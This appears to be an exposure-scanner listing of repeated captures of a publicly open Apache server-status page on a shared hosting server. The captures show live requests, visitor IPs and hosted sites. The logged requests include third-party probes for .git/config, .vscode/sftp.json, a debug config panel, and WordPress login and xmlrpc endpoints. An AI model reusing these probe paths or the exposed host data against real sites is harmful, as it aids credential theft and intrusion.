      93.107.1.136http/1.1zed.sa:80POST /wordpress/xmlrpc.php HTTP/1.1
      
      0-8128400/12/5873_
      1.7490448102780.00.191040.48
      162.158.129.161http/1.1qr.brunch.ws:443GET /storage/cover_image/17089563134221_image.jpg HTTP/1.1
      
      0-8128400/8/6120_
      1.65281147426860.01.19834.17
      176.16.101.244http/1.1albayan.edu.sa:443GET /e_sch/js/jquery.modern-ticker.min.js HTTP/1.1
      
      0-8128400/68/6054_
      1.6726323842076950.067.01984.62
      66.249.73.131http/1.1albayan.edu.sa:443GET /imgweb/A2.pdf HTTP/1.1
      
      0-8128400/13/6740_
      1.7888449808910.00.101044.52
      162.158.129.68http/1.1qr.brunch.ws:443GET /storage/food_image/17162862769554_americano.jpg HTTP/1.1
      
      0-8128400/6/5979_
      1.72171246952840.00.06997.04
      82.197.61.109http/1.1albayan.edu.sa:443GET /registration/asset/preloader.css HTTP/1.1
      
      0-8128400/6/6106_
      1.193122041238740030.00.56734.80
      5.163.35.191http/1.1
      
      0-8128400/8/6774_
      1.68261246349010.00.53660.68
      176.16.101.244http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-8128400/8/6195_
      1.6336887548085110.00.481177.45
      193.143.1.119http/1.1ucc.thenewjeddah.com:443GET /cms/.git/config HTTP/1.1
      
      0-8128400/2/5997_
      1.65333247699810.00.011027.43
      93.107.1.136http/1.1zed.sa:80POST /wordpress/xmlrpc.php HTTP/1.1
      
      0-8128400/24/6267_
      1.72184280898790.04.26778.67
      82.197.61.109http/1.1albayan.edu.sa:443GET /images/image1.jpg HTTP/1.1
      
      0-8128400/8/6029_
      1.702242530056460.00.05850.46
      107.189.6.212http/1.1trynidaa.com:443POST /wp-login.php HTTP/1.1
      
      0-8128400/6/6060R
      1.6336938735628350.00.08993.37
      130.164.131.199http/1.1
      
      0-8128400/57/6150_
      1.7888874245670.00.10951.42
      162.158.129.194http/1.1qr.brunch.ws:443GET /storage/food_image/17162861147551_hotchocolat.jpg HTTP/1.1
      
      0-8128400/8/6304_
      1.5549139116810.00.08958.80
      130.164.131.199http/1.1
      
      0-8128400/6/6316_
      1.7987142624490.00.36889.33
      162.158.129.92http/1.1qr.brunch.ws:443GET /storage/food_image/17088460069724_oip7.jpg HTTP/1.1
      
      0-8128400/15/5987_
      1.75895205542710.00.11780.56
      162.158.129.132http/1.1qr.brunch.ws:443GET /storage/food_image/17096777357107_nutella.webp HTTP/1.1
      
      0-8128400/16/6200_
      1.7987145693270.00.41975.67
      162.158.129.83http/1.1qr.brunch.ws:443GET /storage/food_image/17162865913767_raspberrypistachioespres
      
      0-8128400/6/6049_
      1.7315145449173320.00.351101.84
      176.16.101.244http/1.1albayan.edu.sa:443GET /imgweb/1445/%EF%BF%BD%EF%BF%BD%D9%85%D8%B1%D8%A7%D8%AC%D8%
      
      0-8128400/9/6316_
      1.69246134725560.00.80731.78
      5.163.83.167http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-8128401/14/6310K
      1.800140783970.80.611067.19
      172.70.162.66http/1.1nidaa.ws:80GET /.vscode/sftp.json HTTP/1.1
      
      1-8130820/6/5534_
      1.1388566914370.00.031050.27
      162.158.130.31http/1.1qr.brunch.ws:443GET /storage/food_image/17162860389733_maisonteacup.jpg HTTP/1.
      
      1-8130820/5/5884_
      1.1289657839790.00.181066.69
      162.158.129.52http/1.1qr.brunch.ws:443GET /storage/food_image/17088536517355_imge12175a5596244dd9127e
      
      1-8130820/5/6214_
      1.1288245306380.00.051044.92
      162.158.130.35http/1.1qr.brunch.ws:443GET /storage/food_image/17162858332756_mojitococktail.jpg HTTP/
      
      1-8130820/10/6107_
      1.1587339478760.00.66791.88
      162.158.130.13http/1.1qr.brunch.ws:443GET /storage/food_image/17088461776104_oip7.jpg HTTP/1.1
      
      1-8130820/5/5710_
      1.1587255809690.00.03930.53
      162.158.129.25http/1.1qr.brunch.ws:443GET /storage/food_image/17162870753282_sparklingwaterlarge.jpg 
      
      1-8130820/9/6030_
      1.21606155354730.00.14870.32
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      1-8130820/6/5936_
      1.221071744080.00.05988.02
      31.167.119.169http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      1-8130824/13/6056K
      1.2431431126810.60.11788.74
      31.167.72.252
      Found on 2024-06-02 05:16
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7bb7c2d3f

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Sunday, 02-Jun-2024 01:36:31 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  9 days 21 hours 31 minutes 41 seconds
      Server load: 1.28 1.50 1.49
      Total accesses: 1356907 - Total Traffic: 194.4 GB - Total Duration: 1478764735
      CPU Usage: u933.69 s119.16 cu5497.83 cs1237.95 - .911% CPU load
      1.59 requests/sec - 238.4 kB/second - 150.3 kB/request - 1089.81 ms/request
      14 requests currently being processed, 0 workers gracefully restarting, 236 idle workers
      _____K______________________________K__________R________________
      _____K________________K_K___________W________________K_______WWW
      WWWWWWWWWWWWWWWWWWWWWW_____K______________________________K_____
      _K________K__W__________________________________________________
      _______________K___.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8164280/362/6613_
      50.5521013451422260.077.54863.88
      172.71.114.219http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-8164280/366/5689_
      50.6113311324102060.044.48833.51
      162.158.129.53http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      0-8164280/340/5955_
      50.722237527182790.023.67737.84
      51.36.90.168http/1.1zed.sa:80GET /menu/?fbclid=PAZXh0bgNhZW0CMTEAAaYp75FHNr6nLhLB9m5t2UOfNvG
      
      0-8164280/339/5904_
      50.74787362509880.094.97822.99
      162.158.129.171http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      0-8164280/391/6109_
      50.522533557656760.066.34885.58
      37.243.27.66http/1.1jawad.com.sa:443POST /api/v.1/front/category/product HTTP/1.1
      
      0-8164281/367/5754K
      50.760147963690.853.261037.85
      172.70.90.50http/1.1nidaa.ws:80GET /debug/default/view?panel=config HTTP/1.1
      
      0-8164280/394/5922_
      50.65691447213440.070.96824.63
      66.249.73.76http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=568 HTTP/1.1
      
      0-8164280/374/5857_
      50.581494639822270.019.25912.22
      40.77.167.30http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1702&l_n=1&page=1 HTTP
      
      0-8164280/368/6565_
      50.601348049374330.090.001024.72
      162.158.19.55http/1.1sibaqulhorof.com:443GET /api/v1/app/friends/requests HTTP/1.1
      
      0-8164280/336/5846_
      50.67426846485160.033.61963.06
      173.237.189.235http/1.1trynidaa.com:443POST /xmlrpc.php HTTP/1.1
      
      0-8164280/346/5903_
      50.641022238461930.019.23730.96
      37.243.27.66http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/RqkP7KzY3ncFdtXlV6qrOr
      
      0-8164280/419/6636_
      50.542402545829200.063.66640.55
      37.243.27.66http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      0-8164280/417/6091_
      50.756547845470.075.651164.92
      52.230.152.126http/1.1albayan.edu.sa:443GET /imgweb/msr2.JPG HTTP/1.1
      
      0-8164280/349/5890_
      50.562006947265390.048.51984.21
      52.167.144.219http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1733&page=1 HTTP/1.1
      
      0-8164280/361/6069_
      50.6659079456160.020.78768.76
      34.244.25.88http/1.1albayan.edu.sa:80GET /imgweb/files40/%D8%A7%D8%AC%D8%AA%D9%85%D8%A7%D8%B9%D9%8A%
      
      0-8164280/331/5894_
      50.5718214429740990.042.19827.35
      162.158.129.170http/1.1sibaqulhorof.com:443GET /api/v1/app/general/maintenance_check HTTP/1.1
      
      0-8164280/456/5897_
      50.5816711835176060.057.53931.69
      162.158.129.52http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/avatar/update HTTP/1.1
      
      0-8164280/360/5953_
      50.542355074021110.056.73939.88
      199.45.154.22http/1.1n.jawad.com.sa:443GET / HTTP/1.1
      
      0-8164280/395/6165_
      50.6210112438916590.097.81953.74
      162.158.12.144http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/info HTTP/1.1
      
      0-8164280/432/6195_
      50.7618142184690.0154.61880.16
      162.158.194.139http/1.1sibaqulhorof.com:443GET /api/v1/app/friends/requests HTTP/1.1
      
      0-8164280/426/5859_
      50.60135101205156170.033.22747.01
      162.158.12.147http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/info HTTP/1.1
      
      0-8164280/382/6053_
      50.65809845345320.0171.60967.77
      162.158.18.39http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      0-8164280/347/5908_
      50.721713848967910.0145.281094.64
      162.158.194.137http/1.1sibaqulhorof.com:443GET /api/v1/app/general/TopPlayers?type=1 HTTP/1.1
      
      0-8164280/342/6178_
      50.66641934596310.022.32727.01
      20.235.242.214http/1.1jawad.com.sa:443GET /ar HTTP/1.1
      
      0-8164280/352/6089_
      50.57178640589680.068.821062.04
      37.243.27.66http/1.1jawad.com.sa:443GET /public/front_resources/js/jquery.star-rating-svg.min.js HT
      
      1-8113790/725/5404_
      86.1013411265494160.0110.271046.09
      162.158.18.39http/1.1sibaqulhorof.com:443GET /api/v1/app/general/TopPlayers?type=1 HTTP/1.1
      
      1-8113790/628/5720_
      86.1013413057646170.0191.671057.50
      162.158.18.38http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      1-8113790/684/6050_
      86.16583044627100.0175.821027.44
      34.244.25.88http/1.1albayan.edu.sa:443GET /imgweb/files40/%d8%a7%d8%ac%d8%aa%d9%85%d8%a7%d8%b9%d9%8a%
      
      1-8113790/564/5940_
      86.2118439290840.087.85787.08
      162.158.194.139http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/avatar/update HTTP/1.1
      
      1-8113790/712/5594_
      86.101336255661540.069.24927.21
      162.158.129.38http/1.1sibaqulhorof.com:443GET /api/v1/app/general/maintenance_check HTTP/1.1
      
      1-8113790/675/5856_
      86.1110111653409160.074.89817.90
      162.158.12.145http/1.1sibaqulhorof.com:443POST /api/v1/app/auth/avatar/update HTTP/1.1
      
      1-8113790/673/5828_
      86.205
      Found on 2024-06-01 22:36
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df77e3bcefe

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 01-Jun-2024 23:04:00 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 9
      Parent Server MPM Generation: 8
      Server uptime:  9 days 18 hours 59 minutes 10 seconds
      Server load: 0.45 0.48 0.50
      Total accesses: 1336274 - Total Traffic: 191.8 GB - Total Duration: 1465335486
      CPU Usage: u842.33 s102.31 cu5497.83 cs1237.95 - .908% CPU load
      1.58 requests/sec - 237.8 kB/second - 150.5 kB/request - 1096.58 ms/request
      16 requests currently being processed, 0 workers gracefully restarting, 234 idle workers
      _____________________________________________K_________________R
      _________K_____________________K_______K___________K_________WWW
      WWWWWWWWWWWWWWWWWWWWWW_____________K__________KK_______________K
      ___________________________K___C_K_K___________________________W
      _________________R_.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-8164280/252/6503_
      40.3192151278260.073.38859.72
      176.16.16.241http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.ttf HTTP/1.1
      
      0-8164280/301/5624_
      40.2416512123999910.024.37813.40
      141.101.68.182http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      0-8164280/283/5898_
      40.328712127062300.016.06730.23
      162.158.130.43http/1.1sibaqulhorof.com:443GET /api/v1/app/general/TopPlayers?type=1 HTTP/1.1
      
      0-8164280/276/5841_
      40.2910988362397690.091.01819.03
      172.71.114.143http/1.1sibaqulhorof.com:443GET /api/v1/app/general/TopPlayers?type=1 HTTP/1.1
      
      0-8164280/321/6039_
      40.3574257556210.059.45878.69
      37.105.136.151http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      0-8164280/287/5674_
      40.21181247626560.047.461032.05
      176.224.117.204http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-8164280/323/5851_
      40.30100147081550.067.78821.45
      5.109.101.72http/1.1albayan.edu.sa:443GET /e_sch/css/images/arrow-next.png HTTP/1.1
      
      0-8164280/288/5771_
      40.22175239507150.015.73908.70
      82.167.146.37http/1.1albayan.edu.sa:443GET /e_sch/images/latest_news.jpg HTTP/1.1
      
      0-8164280/306/6503_
      40.382810749148790.082.051016.77
      141.101.68.183http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      0-8164280/264/5774_
      40.1721541144259950.014.46943.91
      114.119.150.158http/1.1daris.live:443GET /product/36 HTTP/1.1
      
      0-8164280/272/5829_
      40.261542238131600.015.72727.45
      194.55.186.251http/1.1nidaa.daaris.com:443GET / HTTP/1.1
      
      0-8164280/294/6511_
      40.15284044119180.057.40634.30
      66.249.73.66http/1.1albayan.edu.sa:80GET /albayan_library/upload/books/__________%20____________%20_
      
      0-8164280/292/5966_
      40.1819918347354430.030.011119.27
      176.224.117.204http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-8164280/270/5811_
      40.401411747178460.046.47982.17
      141.101.68.183http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      0-8164280/301/6009_
      40.3671179389180.019.28767.25
      51.253.134.205http/1.1albayan.edu.sa:443GET /web/images/title.jpg HTTP/1.1
      
      0-8164280/251/5814_
      40.20198127644500.037.61822.77
      95.185.101.55http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/vBf31fXv4mpCKGy62qfYEj
      
      0-8164280/369/5810_
      40.1625437733185790.053.56927.72
      176.45.189.237http/1.1albayan.edu.sa:443GET /imgweb/files40/math11-2.pdf HTTP/1.1
      
      0-8164280/296/5889_
      40.2811610173560890.032.70915.84
      172.70.156.153http/1.1sibaqulhorof.com:443GET /api/v1/app/friends/requests HTTP/1.1
      
      0-8164280/310/6080_
      40.4020338689950.091.99947.92
      37.105.136.151http/1.1albayan.edu.sa:443GET /e_sch/js/rating_news.js HTTP/1.1
      
      0-8164280/370/6133_
      40.37527242066310.0125.37850.91
      37.105.136.151http/1.1albayan.edu.sa:443GET /web/462.html2 HTTP/1.1
      
      0-8164280/257/5690_
      40.16233121205002760.029.73743.52
      141.101.68.183http/1.1sibaqulhorof.com:443POST /api/v1/app/game/start HTTP/1.1
      
      0-8164280/308/5979_
      40.410245213330.0166.98963.15
      172.70.162.251http/1.1nidaa.ws:80GET / HTTP/1.1
      
      0-8164280/262/5823_
      40.2613810348753020.094.381043.74
      141.101.68.182http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      0-8164280/264/6100_
      40.011303034361800.019.95724.63
      159.65.54.83http/1.1
      
      0-8164280/275/6012_
      40.28117240491200.065.561058.78
      31.167.13.208http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/video.png HTTP/1.1
      
      1-8113790/628/5307_
      75.6526265333370.0104.461040.28
      37.105.136.151http/1.1albayan.edu.sa:443GET /e_sch/images/001_43.png HTTP/1.1
      
      1-8113790/565/5657_
      75.6520857053640.0163.651029.49
      95.108.213.227http/1.1alnwisher.com:443GET /Products_view.php?i=327 HTTP/1.1
      
      1-8113790/605/5971_
      75.50117244566760.0173.181024.80
      31.167.13.208http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/thumb_bg.png HTTP/
      
      1-8113790/495/5871_
      75.48137539193250.078.70777.93
      31.167.118.48http/1.1albayan.edu.sa:443GET /e_sch/poll.php HTTP/1.1
      
      1-8113790/613/5495_
      75.511169153719780.059.46917.43
      172.70.156.152http/1.1sibaqulhorof.com:443GET /api/v1/app/friends HTTP/1.1
      
      1-8113790/559/5740_
      75.3520712253256920.072.24815.25
      141.101.68.183http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/single HTTP/1.1
      
      1-8113790/562/5717_
      75.66610971404650.086.30977.16
      141.101.68.183http/1.1sibaqulhorof.com:443POST /api/v1/app/question/get/singl
      Found on 2024-06-01 20:03
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7a2f338fc

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 30-May-2024 22:34:22 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 7
      Parent Server MPM Generation: 6
      Server uptime:  7 days 18 hours 29 minutes 33 seconds
      Server load: 0.45 0.40 0.33
      Total accesses: 1062504 - Total Traffic: 152.5 GB - Total Duration: 1167478439
      CPU Usage: u832.39 s121.96 cu4224 cs945.69 - .912% CPU load
      1.58 requests/sec - 238.2 kB/second - 150.5 kB/request - 1098.8 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 242 idle workers
      ________________________________________________________________
      R_______________K____________C_______________________________WWW
      WWWWWWWWWWWWWWWWWWWWWW________________K________________K________
      _____________K_______________W_______________________K__________
      ___________________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      <SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-6131530/612/5215_
      73.75533735213260.040.24664.07
      52.230.152.182http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/438/4421_
      73.75511520120380.034.23569.56
      52.230.152.182http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/558/4895_
      73.80121624229060.029.24650.95
      54.36.148.81http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=533 HTTP/1.1
      
      0-6131530/556/4704_
      73.745515351301150.048.93592.11
      52.230.152.182http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/546/4778_
      73.79143045772990.039.14749.08
      52.230.152.182http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/576/4589_
      73.78223441706210.0134.32799.75
      52.230.152.182http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/505/4712_
      73.76391335291450.033.16593.87
      52.230.152.182http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/pace/assets/plugins/
      
      0-6131530/549/4504_
      73.78243026994870.0120.56747.03
      52.230.152.182http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/591/5253_
      73.6749041724540.071.70787.39
      199.45.154.51http/1.1
      
      0-6131530/494/4626_
      73.78272633853540.090.43865.52
      52.230.152.182http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/640/4466_
      73.754632228323920.063.25566.04
      52.230.152.182http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/563/5241_
      73.76372926124150.061.98488.18
      52.230.152.182http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery/assets/plugin
      
      0-6131530/566/4728_
      73.76322939900510.0106.361014.34
      52.230.152.182http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/pace/assets/plugins/
      
      0-6131530/537/4754_
      73.8102829504520.064.33831.99
      52.230.152.182http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/588/4932_
      73.75443149517270.091.05664.20
      52.230.152.182http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/pace/assets/plugins/
      
      0-6131530/523/4564_
      73.75411521750470.077.53701.93
      52.230.152.182http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/544/4502_
      73.8023327008340.065.97777.65
      52.230.152.182http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/538/4740_
      73.79173462482780.099.16732.26
      52.230.152.182http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/570/4990_
      73.74573523667110.027.90711.78
      52.230.152.50http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/542/4756_
      73.76343032921810.099.43647.50
      52.230.152.182http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      0-6131530/558/4567_
      73.791913201431330.0135.61644.49
      52.230.152.182http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/647/4861_
      73.8082622836880.032.48649.56
      52.230.152.182http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery/assets/plugin
      
      0-6131530/765/4858_
      73.80101530676530.0107.80769.57
      52.230.152.182http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      0-6131530/611/4944_
      73.804928402030.073.44630.90
      52.230.152.182http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      0-6131530/609/4885_
      73.77293024945820.0132.44835.61
      52.230.152.182http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-6135160/526/4187_
      71.80393442862140.037.53795.41
      52.230.152.182http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      1-6135160/569/4547_
      71.81323243408780.0111.21776.89
      52.230.152.182http/1.1garndhabi.org:80GET /login HTTP/1.1
      
      1-6135160/492/4721_
      71.8513436133620.057.61737.29
      52.230.152.182http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/jquery/assets/plugin
      
      1-6135160/558/4666_
      71.79549732279570.035.04645.62
      149.202.79.129http/1.1trydaris.com:443POST /xmlrpc.php HTTP/1.1
      
      1-6135160/508/4447_
      71.81343132420830.0170.67735.54
      52.230.152.182http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-6135160/556/4396_
      71.81302727850250.0125.49640.23
      52.230.152.182http/1.1garndhabi.org:80GET /up//upload//webarch/js/assets/plugins/pace/assets/plugins/
      
      1-6135160/575/4574_
      71.8523254682240.0122.61782.05
      52.230.152.182http/1.1garndhabi.org:80GET /404 HTTP/1.1
      
      1-6135160/523/4502_
      71.84171435538980.052.35604.22
      52.230.152.182http/1.1garndhabi.org:80GET /admin/dashboard HTTP/1.1
      
      1-6135160/527/4232_
      71.8044
      Found on 2024-05-30 19:34
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7e38c9144

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 30-May-2024 15:11:40 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 7
      Parent Server MPM Generation: 6
      Server uptime:  7 days 11 hours 6 minutes 51 seconds
      Server load: 0.12 0.09 0.09
      Total accesses: 1026261 - Total Traffic: 146.6 GB - Total Duration: 1116610001
      CPU Usage: u650.6 s84.82 cu4224 cs945.69 - .916% CPU load
      1.59 requests/sec - 238.5 kB/second - 149.8 kB/request - 1088.04 ms/request
      13 requests currently being processed, 0 workers gracefully restarting, 212 idle workers
      __________KK______________________________K_________R___K_______
      ___________________K____________________K____________________WWW
      WWWWWWWWWWWWWWWWWWWWWW___________W_____________.................
      ........______R___K___________________K______________________K__
      ____K______________.............................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
